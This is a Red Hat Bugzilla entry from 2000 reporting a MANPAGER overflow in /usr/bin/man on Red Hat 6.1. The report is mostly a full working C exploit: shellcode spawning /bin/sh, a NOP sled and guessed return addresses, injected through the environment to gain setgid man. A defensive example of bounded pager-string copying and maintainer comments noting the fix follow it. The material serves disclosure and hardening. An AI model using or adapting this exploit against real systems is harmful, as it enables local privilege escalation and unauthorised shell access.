Bug 9892 - PAGER env variable can be overflowed...

Status: CLOSED RAWHIDE
Product: Red Hat Linux
Classification: Retired
Component: man
Version: 6.1
Platform: i386 Linux
Priority: medium
Severity: medium
Assigned To: Bernhard Rosenkraenzer
Keywords: Security
Duplicates: 10338
Reported: 2000-03-01 10:04 EST by mathew
Modified: 2008-05-01 11:37 EDT
Last Closed: 2000-03-01 10:50:35 EST
Doc Type: Bug Fix
Attachments: None
Description mathew 2000-03-01 10:04:49 EST
DOH!

    /*
     * (c) 2000 babcia padlina / b0f
     * (lcamtufs idea)
     *
     * redhat 6.1 /usr/bin/man exploit
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/param.h>
    #include <sys/stat.h>

    #define NOP     0x90
    #define OFS     1800
    #define BUFSIZE 4002
    #define ADDRS   1000

    /* return the current stack pointer */
    long getesp(void)
    {
        __asm__("movl %esp, %eax\n");
    }

    int main(int argc, char **argv)
    {
        char *execshell =
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";
        char *buf, *p;
        int noplen, i, ofs;
        long ret, *ap;

        if (!(buf = (char *)malloc(BUFSIZE + ADDRS + 1))) {
            perror("malloc()");
            return -1;
        }

        /* optional first argument overrides the default offset */
        if (argc > 1)
            ofs = atoi(argv[1]);
        else
            ofs = OFS;

        noplen = BUFSIZE - strlen(execshell);
        ret = getesp() + ofs;

        /* NOP sled followed by the shellcode */
        memset(buf, NOP, noplen);
        buf[noplen + 1] = '\0';
        strcat(buf, execshell);

        /* pad the rest of the buffer with the guessed return address */
        p = buf + noplen + strlen(execshell);
        ap = (unsigned long *)p;
        for (i = 0; i < ADDRS / 4; i++)
            *ap++ = ret;
        p = (char *)ap;
        *p = '\0';

        fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf));
        setenv("MANPAGER", buf, 1);
        execl("/usr/bin/man", "man", "ls", 0);
    }
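The overflow the exploit above relies on is a fixed-size buffer receiving an environment value with no length check. As an added example, not the reporter's code and not the source of man 1.5 (which is not on this page; PAGER_MAX and the function names are hypothetical), the following C contrasts that unchecked copy with a bounded one that rejects any PAGER/MANPAGER value that does not fit, and shows the fallback order a viewer might use once an over-long value is refused:

```c
/* Added example (not the code of man 1.5 or of this bug's reporter):
 * bounded handling of a pager command read from the environment.
 * The real man source is not on this page; PAGER_MAX and the function
 * names are hypothetical. It contrasts the unchecked copy into a
 * fixed-size buffer, which an over-long PAGER/MANPAGER value overflows,
 * with a length-checked copy that rejects such values outright. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PAGER_MAX 256   /* hypothetical size of the fixed pager buffer */

/* The unsafe pattern: strcpy() into a fixed buffer with no length check.
 * Anything longer than the buffer runs off its end. Kept only for
 * contrast; nothing below calls it. */
void copy_pager_unchecked(char *dst, const char *value)
{
    strcpy(dst, value);
}

/* Hardened copy: accept the value only if it fits, NUL included.
 * Returns 0 on success, -1 when the value is missing or too long.
 * The length scan is capped at dstsz so an unterminated value is never
 * read past the buffer size either. */
int copy_pager_checked(char *dst, size_t dstsz, const char *value)
{
    size_t len = 0;
    if (value == NULL || dstsz == 0)
        return -1;
    while (len < dstsz && value[len] != '\0')
        len++;
    if (len >= dstsz)        /* no room for the terminator: reject */
        return -1;
    memcpy(dst, value, len + 1);
    return 0;
}

/* Choose the pager the way a viewer might: MANPAGER, then PAGER, then a
 * built-in default. An over-long value is skipped, not truncated, so a
 * half-copied command string is never executed. Returns NULL only if
 * even the default does not fit. */
const char *resolve_pager(const char *manpager, const char *pager,
                          char *dst, size_t dstsz)
{
    if (copy_pager_checked(dst, dstsz, manpager) == 0) return dst;
    if (copy_pager_checked(dst, dstsz, pager) == 0) return dst;
    if (copy_pager_checked(dst, dstsz, "/usr/bin/less") == 0) return dst;
    return NULL;
}

/* Constructed check: an ordinary value is kept, and a MANPAGER value of
 * the size the exploit above builds (4002 + 1000 bytes of filler) is
 * rejected in favour of the next candidate. Returns 1 when both hold. */
int demo_overlong_rejected(void)
{
    char buf[PAGER_MAX];
    char *big = malloc(5003);
    int ok = 1;
    if (big == NULL) return 0;
    memset(big, 'A', 5002);
    big[5002] = '\0';
    if (resolve_pager(NULL, "less -R", buf, sizeof buf) != buf) ok = 0;
    if (ok && strcmp(buf, "less -R") != 0) ok = 0;
    if (ok && resolve_pager(big, "more", buf, sizeof buf) != buf) ok = 0;
    if (ok && strcmp(buf, "more") != 0) ok = 0;
    free(big);
    return ok;
}

/* Boundary check on a tiny buffer: four characters fit in five bytes,
 * five do not. Returns 1 when both decisions are correct. */
int demo_boundary(void)
{
    char tiny[5];
    return copy_pager_checked(tiny, sizeof tiny, "abcd") == 0
        && strcmp(tiny, "abcd") == 0
        && copy_pager_checked(tiny, sizeof tiny, "abcde") == -1;
}

int main(void)
{
    printf("over-long pager rejected: %s\n",
           demo_overlong_rejected() ? "yes" : "no");
    printf("boundary handled: %s\n", demo_boundary() ? "yes" : "no");
    return 0;
}
```

Rejecting rather than truncating is the point of the fallback order: a silently truncated command string would still be handed to the shell, just as a different command than the user set.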
Comment 1 Bernhard Rosenkraenzer 2000-03-01 10:50:59 EST
This is fixed in the 2 most recent rawhide packages (1.5g-8 and 1.5h1-1).
It's not a serious problem though; at worst you can get setgid man, meaning you
can write to /var/catman.
Comment 2 Bernhard Rosenkraenzer 2000-03-24 21:35:59 EST
*** Bug 10338 has been marked as a duplicate of this bug. ***